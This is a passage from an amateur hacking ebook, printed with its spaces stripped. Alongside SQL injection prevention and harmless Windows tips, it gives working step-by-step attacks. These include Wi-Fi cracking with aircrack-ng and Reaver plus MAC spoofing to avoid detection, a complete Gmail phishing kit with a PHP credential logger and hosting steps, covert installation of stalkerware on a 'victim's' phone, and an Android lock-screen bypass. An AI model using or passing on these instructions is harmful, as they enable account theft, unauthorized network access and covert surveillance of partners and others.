practicallyanykindofprogramminglanguagewithanytypeofdatabase.
SQLinjectionflawstypicallylooklikethis:
Thefollowing(Java)exampleisUNSAFE,andwouldallowanattackertoinjectcodeintothequerythatwouldbeexecutedbythedatabase.Theinvalidated“customerName”parameterthat
issimplyappendedtothequeryallowsanattackertoinjectanySQLcodetheywant.Unfortunately,thismethodforaccessingdatabasesisalltoocommon.
Stringquery="SELECTaccount_balanceFROMuser_dataWHEREuser_name="+request.getParameter("customerName");
try{Statementstatement=connection.createStatement(…);ResultSetresults=statement.executeQuery(query);
}PREVENTIONSOption1:PreparedStatements(ParameterizedQueries):
Theuseofprepared
statements(parameterizedqueries)ishowalldevelopersshouldfirstbetaughthowtowritedatabasequeries.Theyaresimpletowrite,andeasiertounderstandthandynamicqueries.ParameterizedqueriesforcethedevelopertofirstdefinealltheSQLcode,andthenpassineachparametertothequerylater.Thiscodingstyleallowsthedatabasetodistinguishbetweencodeanddata,
regardlessofwhatuserinputissupplied.Preparedstatementsensurethatanattackerisnotabletochangetheintentofaquery,evenifSQLcommandsareinsertedbyanattacker.IfanattackerweretoentertheuserID'or'1'='1,theparameterizedquerywouldnotbevulnerable.
2.UsedynamicSQLonlyifabsolutelynecessary.
DynamicSQLcanalmostalwaysbereplacedwithpreparedstatements,parameterizedqueries,orstoredprocedures.Forinstance,insteadofdynamicSQL,inJavayoucanusePreparedStatement()withbindvariables,in.NETyoucanuseparameterizedqueries,suchasSqlCommand()orOleDbCommand()withbindvariables,andinPHPyoucan
usePDOwithstronglytypedparameterizedqueries(usingbindParam()).
Inadditiontopreparedstatements,youcanusestoredprocedures.Unlikepreparedstatements,storedproceduresarekeptinthedatabasebutbothrequirefirsttodefinetheSQLcode,andthentopassparameters.
3:-EscapingAllUser
SuppliedInput
Thisthirdtechniqueistoescapeuserinputbeforeputtingitinaquery.Ifyouareconcernedthatrewritingyourdynamicqueriesaspreparedstatementsorstoredproceduresmightbreakyourapplicationoradverselyaffectperformance,thenthismightbethebestapproachforyou.However,thismethodologyisfrail
comparedtousingparameterizedqueriesandicannotguaranteeitwillpreventallSQLInjectioninallsituations.Thistechniqueshouldonlybeused,withcaution,toretrofitlegacycodeinacosteffectiveway.Applicationsbuiltfromscratch,orapplicationsrequiringlowrisktoleranceshouldbebuiltorre-writtenusingparameterizedqueries.
Thistechniqueworkslikethis.EachDBMSsupportsoneormorecharacterescapingschemesspecifictocertainkindsofqueries.Ifyouthenescapeallusersuppliedinputusingtheproperescapingschemeforthedatabaseyouareusing,theDBMSwillnotconfusethatinputwithSQLcodewrittenbythedeveloper,thusavoidinganypossibleSQLinjectionvulnerabilities.
4.Installpatchesregularlyandtimely.
Evenifyourcodedoesn'thaveSQLvulnerabilities,whenthedatabaseserver,theoperatingsystem,orthedevelopmenttoolsyouusehavevulnerabilities,thisisalsorisky.Thisiswhyyoushouldalwaysinstallpatches,especiallySQLvulnerabilitiespatches,rightaftertheybecomeavailable.
5.Removeallfunctionalityyoudon'tuse.
Databaseserversarecomplexbeastsandtheyhavemuchmorefunctionalitythanyouneed.Asfarassecurityisconcerned,moreisnotbetter.Forinstance,thexp_cmdshellextendedstoredprocedureinMSSQLgivesaccesstotheshellandthisisjustwhatahackerdreamsof.Thisiswhyyoushoulddisablethis
procedureandanyotherfunctionality,whichcaneasilybemisused.
6.UseautomatedtesttoolsforSQLinjections.Evenifdevelopersfollowtherulesaboveanddotheirbesttoavoiddynamicquerieswithunsafeuserinput,youstillneedtohaveaproceduretoconfirmthiscompliance.ThereareautomatedtesttoolstocheckforSQLinjections
andthereisnoexcusefornotusingthemtocheckallthecodeofyourdatabaseapplications.
SQLINJECTME
TESTINGSQLINJECTIONBYUSINGTOOL
OneoftheeasiesttooltotestSQLinjectionsistheFirefoxextensionnamedSQLInjectME.Afteryouinstallthe
extension,thetoolisavailableintheright-clickcontextmenu,aswellasfromTools→Options.ThesidebarofSQLInjectMEisshowninthenextscreenshotandasyoucanseetherearemanytestsyoucanrun:
Youcanchoosewhichteststorunandwhichvaluestotest.WhenyoupressoneoftheTestbuttons,theselectedtestswillstart.Whenthetestsaredone,youwillseeareportofhowthetestsended.
TherearemanyoptionsyoucansetfortheSQLInjectMEextension,asshowninthenexttwopictures:
Asyousee,therearemanystepsyoucantakeinordertocleanyourcodefrom
potentialSQLinjectionvulnerabilities.Don'tneglectthesesimplestepsbecauseifyoudo,youwillcompromisethesecuritynotonlyofyoursitesbutalsoofallthesitesthatarehostedwithyourwebhostingprovider.
WPA2TESTING
WI-FIHACKINGUSINGBACKTRACK
AfterperformingtheSQLinjection,Icanbetthatnowyouhavetheendlesscuriositytoexploremoreaboutthe
ethicalhacking.AndasaccordingtoyourneednowinthisarticlewearegoingtoperformahardcorehackusingBacktrackLinux.wearegoingtolearnthathowtocracktheWI-FIusingBacktrack.onemorethingIwanttoaddherethatallthesestuffIamsharingwithyouisonlyforstudypurpose.ifyouhavetheblackintentionsjustleavethebooknow.Ifyouareperformingthisarticleon
yourcomputer,youwillberesponsibleforanydamageoccurredbyyou.
Solet’sstartthearticle:
NowletusstartwiththeWi-Ficracking.ButbeforestartingthetutorialletmegiveyouasmallintroductiontowhatWi-Fihackingisandwhatisthesecurityprotocolsassociatedwithit.
Inasecuredwirelessconnectedthedataoninternetissentviaencryptedpackets.Thesepacketsaresecuredwithnetworkkeys.Therearebasically2typesofsecuritykeys:
WEP(WirelessEncryptionProtocol):-Thisisthemostbasicformofencryption.Thishasbecomeanunsafeoptionasitisvulnerableandcanbecrackedwithrelative
ease.Althoughthisisthecasemanypeoplestillusethisencryption.WPA(WI-FIProtectedAccess):Thisisthemostsecurewirelessencryption.Crackingofsuchnetworkrequiresuseofawordlistwithcommonpasswords.Thisissortofbruteforceattack.Thisisvirtuallyuncrackableifthenetworkissecuredwithastrongpassword
Solet’sbegintheactualWi-FiHackingtutorial!InordertocrackWi-Fipassword,yourequirethefollowingthings:
FortheWi-FihackingyouneedtoinstalltheBacktrackonyourcomputer.
IamassumingthatyouhavealreadyinstalledtheBacktrackonyourpc.Ifnotit’sveryeasytoinstallbymakingbootablelive
CD/DVD.ForinstallingprocessesyoucanjustGoogleit.Youwillgetiteasily.
Nowopentheconsolefromthetaskbar,Clickontheiconagainstthedragonlikeiconinthetaskbarintheabove
screenshot.YouwillhaveaCommandPromptlikeShellcalledasconsoleterminal.
1)Let'sstartbyputtingourwirelessadapterinmonitormode.Itallowsustoseeallofthewirelesstrafficthatpassesbyusintheair.Typeairmon-ngintheconsoleterminalandpressEnter.Youwillhaveascreenlikethis,notedownthenameof
interface,inthiscasethenameiswlan0.
2)Nowtypeifconfigwlan0downandhitenter.
Thiscommandwilldisableyourwirelessadapter;weare
doingthisinordertochangeyourMACaddress.
Now,youneedtohideyouridentitysothatyouwillnotbeidentifiedbythevictim.todothisyouneedtotypeifconfigwlan0hwether00:11:22:33:44:55andhitenter.
ThiscommandwillchangeyourMACaddressto00:11:22:33:44:55.
3)Nowthenextworkistotypeairmon-ngstartwlan0andpressenter.
Thiswillstartthewirelessadapterinmonitormode.Notedownthenewinterfacename,itcouldbeeth0ormon0orsomethinglikethat.
Theabovecommandintheconsolehasstartedyournetworkadapterinmonitormodeasmon0:
4)Nowthatourwirelessadapterisinmonitormode,
wehavethecapabilitytoseeallthewirelesstrafficthatpassesbyintheair.Wecangrabthattrafficbysimplyusingtheairodump-ngcommand.
Thiscommandgrabsallthetrafficthatyourwirelessadaptercanseeanddisplayscriticalinformationaboutit,includingtheBSSID(theMACaddressoftheAP),power,numberofbeacon
frames,numberofdataframes,channel,speed,encryption(ifany),andfinally,theESSID(whatmostofusrefertoastheSSID).Let'sdothisbytyping:
airodump-ngmon0
Intheabovescreenshotthereisalistofavailablenetworks,Choose1networkandnotetheBSSIDandchannelofit.5.)Typeairodump-ng-cchannelno–bssidBSSIDN1mon0-wfilenameandhitenter.
Replacechannelno.andBSSIDN1withthedatafromstep4.Replacethemon0withnetworkinterfacenamefromstep3.Inplaceoffilenamewriteanynameanddorememberthat.Betterusefilenameitself.
Thiscommandwillbegincapturingthepacketsfromthenetwork.Youneedtocapturemoreandmorepacketsinordertocrackthe
Wi-Fipassword.Thispacketcapturingisaslowprocess.
6.)Tomakethepacketcapturingfaster,wewilluseanothercommand.Openanewshell,don’tclosethepreviousshell.Innewshelltypeaireplay-ng-10-aBSSIDN1-h00:11:22:33:44:55mon0andhitenter.
ReplacetheBSSIDN1with
thedatafromstep4andmon0fromstep3.Thiscommandwillboostthedatacapturingprocess.The-1tellstheprogramthespecificattackwewishtousewhichinthiscaseisfakeauthenticationwiththeaccesspoint.The0citesthedelaybetweenattacks,-aistheMACaddressofthetargetaccesspoint,-hisyourwirelessadaptersMACaddressandthecommand
endswithyourwirelessadaptersdevicename.
7.)Nowwaitforfewminutes,lettheDATAintheotherconsolereachacountof5000.
8.)Afteritreaches5000,openanotherconsoleand
typeaircrack-ngfilename-01.capandhitenter.Replacethefilenamewiththenameyouusedinstep5.Add-01.captoit..capistheextensionoffilehavingcaptureddatapackets.Aftertypingthiscommand,aircrackwillstarttryingtocracktheWi-Fipassword.IftheencryptionusedisWEP,itwillsurelycrackthepasswordwithinfewminutes.
IncaseofWPAusethefollowingcommandinsteadoftheaboveaircrack-ng-w/pentest/wireless/aircrack-ng/test/password.lst-bBSSIDN1filename-01.cap
ReplaceBSSIDN1andfilenamewithdatayouused./pentest/wireless/aircrack-ng/test/password.lstistheaddressofafilehavingwordlistofpopularpasswords.IncaseofWPA
aircrackwilltrytobruteforcethepassword.AsIexplainedabovethattocrackWPAyouneedafilehavingpasswordstocracktheencryption.Ifyouareluckyenoughandthenetworkownerisnotsmartenough,youwillgetthepassword.
PREVENTION:Forthepreventionfrombeinghackedyoucanrefertothechapter
“PASSWORDCREATINGPOLICIES”.
NEWBIE’SWAYTOWARDSREVERSEENGINEERING
Now-a-dayspeopleexpectmorethansomethingwithanapplicationasitisprovidedbythedevelopers.Peoplewanttousethatspecificapplicationaccordingtotheirownpreferences.Sonowwe
areherewithanarticleonthetopicreverseengineering.Let’sstartwithsimpleengineering,“simpleengineering”isthetasktodevelop/buildsomethingBUTReverseengineeringreferstothetasktoredevelop/re-buildsomething.Insimplewordsreverseengineeringisthetasktomodifythesourcecodeoftheapplicationtomakeitworkaccordingtoourway,
Reverseengineeringisaverycomplicatedtopicandisverydifficulttounderstandforbeginnersasitrequiresapriorknowledgeofassemblylanguage.
Developingiseasybuttore-developingisnoteasy!!Becausewhiledevelopmentaprogrammerhastodealwiththefunctions,pointers,conditions,loopsetc…ButwhileDE-compilation
processweneedtodealwithregisters!
Generally32bit/64bitwindowssupportsmainly9registers:–
PerformingRegisters———————–>EAX:ExtendedAccumulatorRegister
>EBX:BaseRegister>ECX:CounterRegister
>EDX:DataRegister
Index———>ESI:SourceIndex
>EDI:DestinationIndex
Pointer———–>EBP:BasePointer
>ESP:StackPointer>EIP:InstructionPointer
So,let’smovetowardsourway“Howtomodifytheapplications”Thegeneralrequirementsyouneedforthemodificationarelistedbelowandeasilyavailableontheinternet:–1.OllyDBG
2.CrackMeApp(clickheretodownload)(registerandactivateyouraccountbeforedownload)PROCESS:
Whenyouhavedownloadedboththeapps,firstofallyouneedtolaunchtheCrackMeApp.Itwillaskyoutoenterthepassword,enteranypasswordyouwantandhiton“OK”.
Nowitwillshowyoutheerrorthat“Youarenot
authorizedtousetheapplication”.
NowopentheOllyDBGandopentheCrackmeappinit.WhenyouhaveopenedtheCrackmeappinOllyDBG,nowintheupper
leftbox,whilescrollingupyoufindthestatementlikethis:–JESHORTPassword.00457728
Basically,thisisaconditionaljumpthatmeansiftheconditionistruethenitwilljumpto00457728Whichshowsusthemessage“Youarenotauthorizedtousethe
application”andiftheconditionisnottrueitjustcontinuesreadingthecode,Sowedon’tneedthisjumptoworkaswedon’twanttogettheerrormessage.
Nowforremovingtheerrormessage,wecanchangeJESHORTPassword.00457728toJNESHORTPassword.00457728,JNE(JumpIfNotEqual)meansthatifthepasswordis
correctitwillgiveyoutheerrormessageandifthepasswordisincorrectitwillgiveyouthecorrectmessage.
ForchangingthequeryjustdoubleclickthelineJESHORTPassword.00457728andsimplychangeittoJNESHORTPassword.00457728
andHiton“Assemble”.
NowHITonblue“PLAY”buttonintheuppersideoftheOllyDBGtostarttheCrackmeappagainandenterthepasswordthenitwillgiveyouthecorrectmessage.
PHISHINGATTACKAHEAD
EMAILANDFACEBOOKHACKINGBYPHISHING
Whatisphishing?
Phishingisanattemptbythesendertohavethereceiveroftheemailtoreleasetheirpersonalinformationi.e.theattackerluresthevictimsto
givesomeconfidentialinformation.
Whyphishing?
Therearemanypasswordcrackingtoolsthatarecomingandgoinginto/fromthemarket.Butphishingisthemostefficientmethodtostealconfidentialinformationlike,passwords,Creditcardnumbers,Bankaccountnumbersetc.
Howphishingworks?
Itworksjustlikenormalfishing.Afishermangenerallythrowsbaitintothewatertolurethefish.Thenafishcomestotakethefoodfeelingthatitislegitimate.Whenitbitesthebait,itwillbecaughtbythehook.Nowthefishermanpullsoutthefish.
Inthesameway,thehacker
sendsafakeloginpagetothevictim.Thevictimthinksthatitisalegitimateoneandentershisconfidentialinformation.Nowthedatawillbewiththehacker.Now,let’slearnhowtohackbyphishing:IamselectingGmailaccounttobehackedbyphishing.
Forphishingyouneedthefollowingstuffs:Firstofallyouhavetoopen
thegamil.combyyourbrowserandwhenpageopencompletely,justgivearightclickonthepageandadialogueboxwillopensafteryouhavinganoption“viewpagesource”init.Clickonthe“viewpagesource”optionandyouseethatthesourcecodeofthatpagewillopensafteryou.Thenpressctrl+Ftoopenthetext/wordfindingbox.Type“action=”andreplace
itwithanything.phpSuchas“action=mail.php”Thenfindforthe“method=”andalsoreplaceitwith“get”.Suchasmethod=”get”.
Thensavethefilebyanything.htmlSuchas“Gmail.html”Thencreateablanknotepadfile“log.txt”Theagainopenthenotepadandtypethefollowingcodes:
<?phpheader("Location:http://www.Gmail.com");$handle=fopen("logs.txt","a");foreach($_GETas$variable=>$value){fwrite($handle,$variable);fwrite($handle,"=");fwrite($handle,$value);fwrite($handle,"\r\n");}fwrite($handle,"\r\n");fclose($handle);exit;
?>
Andsaveitas“mail.php”(savethisfilebysamenameasyouhavereplacedthe“action=”)Nowfinallyyouhavethethreefileswhicharerequiredforthephishing.1)Gmail.html(fakeloginpage)2)mail.php(tocapturethelogindetails)3)log.txt(tostorethe
captureddetails)
Procedure:step1:createanaccountinanyfreewebhostingsitelikewww.bythost.comwww.000webhost.comwww.ripway.comwww.my3gb.com
step2:Nowuploadallthethreefilesyouhavedownloaded.(Ihavetakenwww.my3gb.com)
step3:Givethelinkofthefakepagetoyourvictim.
eg:www.yoursitename.my3gb.com/Gmail.htmlStep4:whenheclicksthelink,itopensafakeGmailpagewhereheentershislogindetails.Whenheclickssigninbutton,hislogin
detailswillbestoredinlog.txtfile.Demonstration:
HereIhaveuploadedmyscriptsontowww.my3gb.com
AndcopytheGmail.htmllinkwhichyouhavetosendthevictim.iclickedtheGmail.htmllinkAfakepagewasopenedwhereienteredmylogindetails.
ThispagewilllooksexactlysimilartotheoriginalGmailloginpage.Andwhenthevictimentershis/herlogindetailsforlogginginintohis/heraccount.Now,thistimethevictimwill
redirectedtotheoriginalGmailloginwebsite.Thevictimwillevendon’tknowthathis/heraccountgothacked.Victimwillthinkthatthepagegetsreloadedduetointerneterrorsorloginmistakesetc.
Nowhis/herlogindetailswerecapturedbythephpscriptandstoredinlog.txtfileasshowninthefigurebelow:
InthesamewayyoucanhackFACEBOOKaccountsandothersocialnetworkingaccounts.Howtoprotectourselvesfromphishing?Don’tuselinks
Besuspiciousofanye-mailwithurgentrequestsByusingsecuredwebsitesUsingefficientbrowsersUsingAntivirusorinternetsecuritysoftware.
USBSECURITY
SecuringPenDrivesFromMaliciousViruses
Today,agiantdownsideforwindowsuseristosecuretheirdatafromviruses.Especially,inPendrives,
nobodyneedstokeeptheirvitaldatainpendrivesasaresultofpendrivessquaremeasuretransportabledevicesandthroughsharingdataitmaygetinfectedbyviruslikeshortcutvirus,Autorun.inf,andnewfoldervirusetc.SomefolksrecovertheirdatabymerelyusingCommandprompthoweversomefolksassumethere’ssolelypossibilityleftanditistoformatthependrive.
So,ifyourpendriveisinfectedbyanyofthosevirusyoucanmerelyfollowthesesteptoinduceyourhiddendataback.
OpenCMD(commandprompt)OpenFlashdriveinCMD(ifyourdriveis‘G’thanenter‘G:’afterc:\user\press[ENTER])Nowtypefollowingcommandandhitenter:attrib-s-h/s/d
Nowopenyourpendriveinwindowsyoumayseeallofyourfiles.Howeverwait!isitenough?Noway!yourpen
driveisstillnottotallysecure.Higherthancommandsimplyshowsallofyourfilesthatsquaremeasurehiddenbyviruses.IfyouwanttoshieldyourUSBfromobtainingunwantedfilesi.e.virus,worm,spy,Trojanetc.thenyouneedtofollowthesesteps.
WhatI’mgoingtotellyouisthatawaytosetupyourregistrytofinishacomputer
fromsavingfilestoyourUSB.Ifyouhavewindowssevenorwindowseightthenyou’llimmobilizethewritingchoicetoUSBdrives.ThistrickisincrediblyusefulifyouhavevirusinyourlaptopandwanttorepeatfilesfromaUSBDrivehoweveralsodon’twanttotransfervirustotheUSB.FollowthegivenstepstodisabletheUSBwritingoption:
Opennotepadandreplicaandpastethefollowing:
WindowsregistryEditorVersion5.00[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]
“WriteProtect”=dword:00000001Nowkeepthefilewiththeextension“.reg”.
Clickonthefileyounowsaved.withinthepop-up
windowselectedaffirmativeandthenOK.That’sityourUSBiscurrentlysecureTURNINGTHESECURITYOFF
TojustoffthissecuritymeasureOpennotepadandcopyandpastethefollowing:WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlStorageDevicePolicies]“WriteProtect”=dword:00000000
Nowoverlookedthefilewiththeextension“.reg”.Clickonthefileyoucurrentlysaved.withinthepop-upwindowclickaffirmativeandthenOK.That’sityourdefenseiscurrentlydisabled.
PDFSECURITY
HOWTOPROTECTYOURPDFFILESFROMCOPYING
Nowthesedaysit’sabigdealtosecureyourPDF
documents.InthisarticleIwillshowyouthat“HOWTOPROTECTYOURPDFFILESFROMBEINGCOPIEDFORPIRATIONANDOTHERMALITIOUSINTENTIONS”.
ForprotectingyourPDFfilesyoucanuseatool“A-PDFpasswordsecurity”toprotectaPDFfile.YoucansetpasswordandpreventpeoplefromcopyandpastePDF
contents,hereisaneasytutorialtomakeyouawareabouttheuseofthattool.
Installthe“A-PDFpasswordsecurity”.Launchtheprogramandopenthepasswordprotectwizard.
selecttheoption“singlepdfdocumentsecurity”andpushthebutton“next>”Click“browse”buttontoopenapdffilewillbe
encrypted,selectthesecuritylevelandencryptionmethod.Youcansetuppasswordforopeningandmodificationofyourdocument.
Click“save”or“saveas”tosetadocumentopenpasswordanddisallowcopyingpermission.
AftersavingthefileyouwillchoosetoopensavedPDFfilewiththedefaultPDFviewer,setanotherPDFfilesecurityoropendestination
folderinwindowsexplorer.
OpensavedPDFfilewiththedefaultPDFviewer.
NOTIFYME
SENDINGAMESSAGETOOTHERUSERINYOURPC
Inthisarticlewearegoingtolearnthathowtosendanymessagetotheotheruseraccountassociatedwithyour
ownpc.
Let’sassumeifyouwanttoleaveanymessageforyourbrotherandsisterwhohaveuseraccountsassociatedwiththesamepcinwhichyouhavealsoauseraccount.
Sofollowthesestepstopassanymessagewhichyoutoanotheruseraccountathisnextlogin.
OpenthetaskmanagerofyourpcbyclickingCTRL+ALT+DELkeyssimultaneously.Thenclickonuseroptiontoviewtheavailableuseraccountassociatedwithyourpc.
Selectanyanotheruseraccountwhichyouwanttopassthemessage.Thenclickonthe“sendmessage”optionplaceinthelowerrightcorner.
Adialogueboxwillbeopenafteryou.Typeanymessageyouwanttoconveythem.If youwanttoshockthemthenyoucantype“HELLOUSER…YOURCOMPUTER
ISINFECTEDBYTROJAN”
Andwhenanotheruserlogintohis/heruseraccount,thesamemessagewillbedisplayedtohim.
“IAMAFOLDERIDON’THAVEANAME”--------?HOWTOCREATE
AFOLDERWITHEMPTYNAME
Thisisthemostinterestingarticleofthisbook,andhereIwillshowyouthathownocreateafolderwithoutnamingit.Sometimesitwillbeveryusefulforyou.
Let’sassumeyouhavehidedanyfoldersimply.Andwhenyouwillsearchitbyname
fromtheaddressbaritwillbeopenedeasily.Solet’sthinkthatiftherewillbeanyfolderwithoutnamethenhowcanitbepossibletosearchitfromaddressbarorsearchbox.Sofollowthesestepstocreateafolderwithoutname:Openthelocationwhereyouwanttocreatethefolder.Justrightclickanywheretocreatethefolder.
WhenitaskstorenamethefolderjustclickALTkeyandbykeeppressingtheALTkeypress“2,5,5”onebyone.Andthenenter.
Youwillfindthatthereit
createsafolderwithouthavinganyname.
SPYINGWITHANDROID
HACKINGANDROIDPHONE
Hellofriends,nowinthisarticlewewilllearnthathowtospyoveranandroidphone.Nowthesedaysaretheeraofsmartphonesbasedon
androidspecially.InthisarticleIwillshowyouthathowtogetthedetailsofthevictimbyspyingovervictim’sandroidphone.Thisisthebestwaytokeeptrackingyourchildandalsoyourgirlfriends.
ForspyingnowIamusingatoolnameasTHETRUTHSPY.
Byusingthistoolyoucaneasilykeeptrackingthevictim’sandroidphone.
Iamshowingyouthescreenshotsofthosethingswhichwecanspyfromanandroidphone…suchasCALLHISTORY,WHATSAPPMESSAGES,andSMSDETAILSetc.…listisshownbelowinthescreenshot.
Note:-thistoolisalsoavailableforIOSdevices.
Youhavetofollowthestepstostartspying.
Firstofallyouhavetodownloadtheapkfileofthistoolandinstallitonthevictim’sandroidphoneandlogintoit.Thistoolisonlyof800kbsoyoucaneasilymanageit
withinseconds.Averyinterestingthingisaboutthistoolisthatyoucanalsohidethistoolfromthevictimsandroidphone.sothatvictimwillnotawareaboutit.Nowyoucandownloadtheapkfilefromthewebsite(my.thetruthspy.com).Afterinstallingtheappgoonthesamewebsiteoftheappbyyourcomputerandresisterusingyouremailidandlogintoviewthedetailsofthe
victim’sandroidphone.ForgettingdetailsgetensurethatthedataconnectionofthevictimsphoneshouldbeON.Whenyouwanttounhidetheappfromthevictim’sphonejustmakeacallfromthevictim’sphoneto#2013*.
Note:-sometimesthis“thetruthspy”isstopworking.soyoucanalsosearchanyotherspytoolbysimpleGooglesearches.You
willfindalotoftoolslikethisandhavealmostsamefunctioning.
MOBILE:“ICANCONTROLYOURPC”
FULLCONTROLYOURPCBYPHONE
NowIhaveaveryinterestingthingforyou……Iknowyougottiredbythosedifficulthackingschaptersmentionedinabovechapters.
InthisarticleIaregoingtotellyouthathowtocontrolyourcomputerfullybyyourmobilephone.It’saveryinterestingthingforyouifyougottiredbyusingthetrackpadandkeyboardofyourcomputer.
Solet’sseehowtodoit:InthisarticleIamgoingtouseatoolnameasUNIFIEDREMOTEwhichisusedtoremoteourpc.
Unifiedremoteisanappthat
letsyoucontrolyourentirewindowscomputerfromyourandroiddevice.itturnsyourdeviceintoaWi-FiorBluetoothremotecontrolforalltheprogramsonyourcomputer.Withthisappyoucancontrolawiderangeofapplications,includingsimplemouseandkeyboard,mediaplayersandotherexternalgadgetsthatcanbeconnectedtoyourcomputer(suchasUSB-UIRTandtellstick).it
evenprovidesextensivecapabilitiesforuserstocreatetheirowncustomremotesfortheirneeds.
Youhavetofollowthesimplestepstoremoteyourpcbyunifiedremote:
Downloadandinstalltheunifiedremoteserveronyourcomputer(windows).YoucaneasilyfinditbyyourGooglesearches.Whenyou
installedit…..Launchit.
ConnectyourandroidphonetothesameWi-Finetworkasyourcomputer.AlternativelyifyourcomputeridBluetoothready,pairitwithyourphone.
Downloadandinstalltheapkfileofunifiedremotefromtheplaystore.Atlaunch,confirmthatyouhaveinstalledtheserver.
Thenaddanewserver,select“automatic”andtheappwillfindyourcomputer.Tapyourcomputersnametoconnect.Nowyouarereadytostartcontrollingyourcomputerwithphone.Tapremoteintheapp.
The“Basicinput”remotewillpromptthemouse,whichyoucanuseasatrackpad.Instructionsforusingthe
mousewillappearonscreen.Alsotherearelotofoptionsareavailablebywhichyoucancontrolyourcomputerindifferentways.
Example:-keyboardcontrolling,filemanager,media,power,start,YouTubeetc.
LAUNCHGODMODE
LAUNCHINGWINDOWSGODMODE
HereIhaveanicewindowstrickforyouwhichsavesyourmuchtime.Inthisarticlewewilllearnthathow
tolaunchGODMODEinyourcomputer.
Windowsgodmodeisasimplewaytocentralizedaccessalltheadministrativeoptionsthatarenormallyseeninsidecontrolpanelintoanewlycreatedfolderwhichcanbeplacedanywhereinsidecomputer.Usuallytheadministrativeoptionsareseenscatteredinsidethecontrolpanelarrangedin
differentcategoriesandsubcategories.Windowsgodmodearrangesalltheadministrativeoptionsinsideonesinglewindow.Youfinditmuchmoreneatlyarrangedanduserfriendly.
Let’sseehowtolaunchgodmodeinsimplesteps:Youneedtocreateanewfolderforthislaunch.Rightclickatthewindowwhereyouwanttocreatea
newfolder.When itasksyoutorenamethatfolderyouhavetoenter
followingcodeswithanyword.
Example:Ujjwal.{ED7BA470-8E54-465E-825C99712043E01C}OrSaurabh.{ED7BA470-8E54-465E-825C-99712043E01C}Or
Anything.{ED7BA470-8E54-465E-825C-99712043E01C}
Don’tforgettousecurlybrackets.Afterrenamingthefolder
pressenter.
Andyouwillseethattheiconofthatfolderwillbechangedandwhenyouwillopenityouwillfindallthesettingsarrangedinwellmannerinit.
CRACKINGLOCKSCREEN
HOWTOCRACKANDROIDLOCKSCREEN
Inthisarticlewearegoingtolearnthathowtobypasstheandroidlockscreen.
WearegoingtobypassthelockscreenusingatoolnameasAromaFilemanager.
Thisisthebestmethodforcrackandroidpatternlock;youmusthavecustomrecoveryinstalledonyourdeviceinordertousethismethod.Let’sstartthecrackingandroidlockscreen.
FirstofalldownloadAromaFilemanagerzipfile.Googleitandyouwillfinditeasily.
NowcopythisAromafile
managerziptorootofyourSDcard.AftercopyingzipfiletoSD,bootyourphoneintoRecoverymode(Eachphonehasdifferentkeycombinationtobootupinrecoverymode,youcansearchitonGoogle).
Inrecoverychoose“installzipfromSDcardorapplyupdatefromSDcard”,nowselectAroma.zipwhichyouhavedownloadedearlier.
AfterinstallingorupdatingAromafilemanagerwillopen,usevolumeupanddownkeysforScrollingasyoudoinrecovery.InAromafilemanagergotomenuwhichislocatedatbottomstripafterclickingmenuselectsettings.Gotobottominsettingsandthenselect“mountallpartitionsinstartup”aftermountingexitAromafilemanager.NowlaunchAromafile
manageragain.InaromaGotoData>>System.Youwillfind“Gesture.key”ifyouhaveappliedgesturelockor“Password.key”ifyouhaveappliedpassword.
Longpress“Gesture.key”or“Password.key”whichoneisavailable,afterlongpressingitwillpromptsomeoption,choosedeleteanddeletethatfileandrestartyour
device(firstexitfromaromafilemanagerthenrestartyourphone).
Yuppie!Yourphoneisunlockednow.Afterrebootingitwillaskyouforlockpatterndon’tworrynowyoucanuseanypattern,youroldpatternhasgoneaway.
REAVERBACKTRACK
WI-FICRACKINGUSINGREAVERINBACKTRACK
Well,inthisarticleIwillshowyouthathowtocrackWPA2-PSKkeyusingatoolnamesasREAVER.Reaver
usetocrackthekeybybruteforcemethod.
Let’sseehowtocrackthekeyusingBacktrack.NowIamusingBacktrack5r3.Soopentheconsoleandfollowthegivensteps:Firstthingistodoisrunthecommand:Airmon-ngstartwlan0
Nowthenextcommandtowriteis:Airodump-ngwlan0WiththiscommandwelookforavailablenetworksandinformationregardingBSSID,PWRBeacons,data,
channeletc…
Nowyouneedtorunthefollowingcode:Reaver-imon0-b-cBSSID–cchannelnetworknameNote:-UsethevaluesofBSSIDchannelandnetworknameintheabovecommand.
Ihaveexecutedthecommandanditstartstoworkasshowninthepicturebelow:
Nowyouhavetowait,timetakenisdependentonthe
strengthofpasswordandthespeedofyourinternetconnection,
AndfinallyafterbruteforcingitwillgiveyoutheWPA2pin.
WINDOWSSHORTCUTS
SOMEUSEFULWINDOWSSHORTCUTS
1.WindowsKey+Tab:Aero2.WindowsKey+E:LaunchesWindowsExplorer3.WindowsKey+R:Run
Commandbox4.WindowsKey+F:Search5.WindowsKey+X:MobilityCenter6.WindowsKey+L:LockComputer7.WindowsKey+U:EaseofAccessbox8.WindowsKey+P:Projector9.WindowsKey+T:CycleSuperTaskbarItems10.WindowsKey+S:OneNoteScreenClipping
Tool11.WindowsKey+M:MinimizeAllWindows12.WindowsKey+D:Show/HideDesktop13.WindowsKey+Up:MaximizeCurrentWindow14.WindowsKey+Down:RestoreDown/Minimize15.WindowsKey+Left:TileCurrentWindowtotheLeft16.WindowsKey+Right:TileCurrentWindowsRight
17.WindowsKey+#(anynumber)18.WindowsKey+=:Magnifier19.WindowsKey+plus:Zoomin20.WindowsKey+Minus:Zoomsout21.WindowsKey+Space:Peekatthedesktop
DATAFORENSICS
HOWTORECOVERPERMANENTLYDELETEDFILES
Inthisarticlewewilllearnthathowtorecoverour
permanentlydeletedfilesfromourcomputer.Sometimesyourimportantdataisaccidentlydeletedfromyourcomputeraswellasfromrecyclebinalso,andit’sveryimportanttorecoverthatfileordata.
SohereIamusingatoolnameas“stellarphonixwindowsdatarecovery”torecoverthepermanentlydeletedfiles.
Byusingthistoolyoucanrecoveryouraccidentlydeleteddatafromyourcomputer.
Forityouhavetofollowsimplestepsasmentionedbelow:
Clickontheoption“deletedfilerecovery”or“folderrecovery”accordingtoyourchoice.Thenchoosethelocaldrivefromwhereyouwanttoscanforthedeletedfiles/folder.Thenitasksyouforaquickscanordeepscan,youcanchooseasaccordingtoyour
need.
Afterthatitscansforallthedeletedfiles/folderfromyourparticularselectedlocaldrive.
Andshowyouthelistoftheentirefolderfromwhichfilesaredeleted.
Thenyouhavetoselectyourdeletedfile/folderwhichyouwanttorecover,asIhaveselectedhere“hackingtools”fromthefolder“vi”.Andthenclickonthe
